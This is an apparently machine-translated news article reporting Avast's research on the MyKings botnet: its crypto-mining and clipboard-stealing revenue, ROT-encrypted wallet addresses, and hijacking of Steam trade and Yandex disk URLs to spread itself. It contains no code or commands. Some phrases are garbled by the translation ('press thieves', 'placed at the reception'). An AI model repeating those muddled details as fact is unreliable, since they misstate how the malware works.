The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, earning huge sums of money in crypto, five years after it first appeared in the wild.
Being one of the most analyzed botnets in recent history, MyKings is of particular interest to researchers thanks to its vast infrastructure and versatile features, including starter kits, miners, droppers, press thieves. – papers, etc.
The latest team of researchers to look into MyKings is Avast Threat Labs, which has collected 6,700 unique samples for analysis since early 2020.
During the same period, Avast actively prevented more than 144,000 MyKings attacks against its customers, most of them based in Russia, India and Pakistan.
The botnet uses many cryptocurrency wallet addresses, some of which have quite high balances. Avast believes the cryptocurrency in these wallets was amassed by the clipboard thief and crypto mining components.
The revenue reflected in MyKings-linked wallet addresses is approximately $ 24.7 million. However, since the botnet uses over 20 cryptocurrencies in total, this amount is only a part of its total financial earnings.
To protect the value of the hard-coded wallet address from extraction and analysis, the malware encrypts it with a simple ROT encryption. In general, however, no noticeable upgrades have been spotted on this front in recent samples.
New URL Substitution Tips
Besides wallet address substitution that hijacks transactions, Avast has also spotted a new monetization technique used by MyKings operators involving the Steam gaming platform.
The latest versions of the malware also feature a new URL manipulation system in the clipboard stealing module, which attackers created to hijack trade transactions of Steam objects. The module changes the URL of the commercial offer, so that the actor is placed at the reception, stealing valuables in the game, etc.
Similar functionality has been added for the cloud disk storage service Yandex, with MyKing manipulating URLs sent by users to their acquaintances.
The modified links point to Yandex storage addresses containing RAR or ZIP archives named “photos”, which provide a copy of the MyKings malware to these machines.
In 2018, MyKings was growing steadily, with malware reaching 520,000 infections and bringing in millions of dollars to its operators.
Today, it seems that the botnet has taken on new proportions while managing to remain hidden and safe from law enforcement repression.
- MikroTik shares information on securing routers affected by huge Mēris botnet
- Cryptocurrencies are all the rage, but is your money in good hands?
- Money launderers for Russian hacking groups arrested in Ukraine
- FreakOut botnet now attacks vulnerable video DVR devices
- Bitcoin.org Hackers Steal $ 17,000 in Double Your Money Scam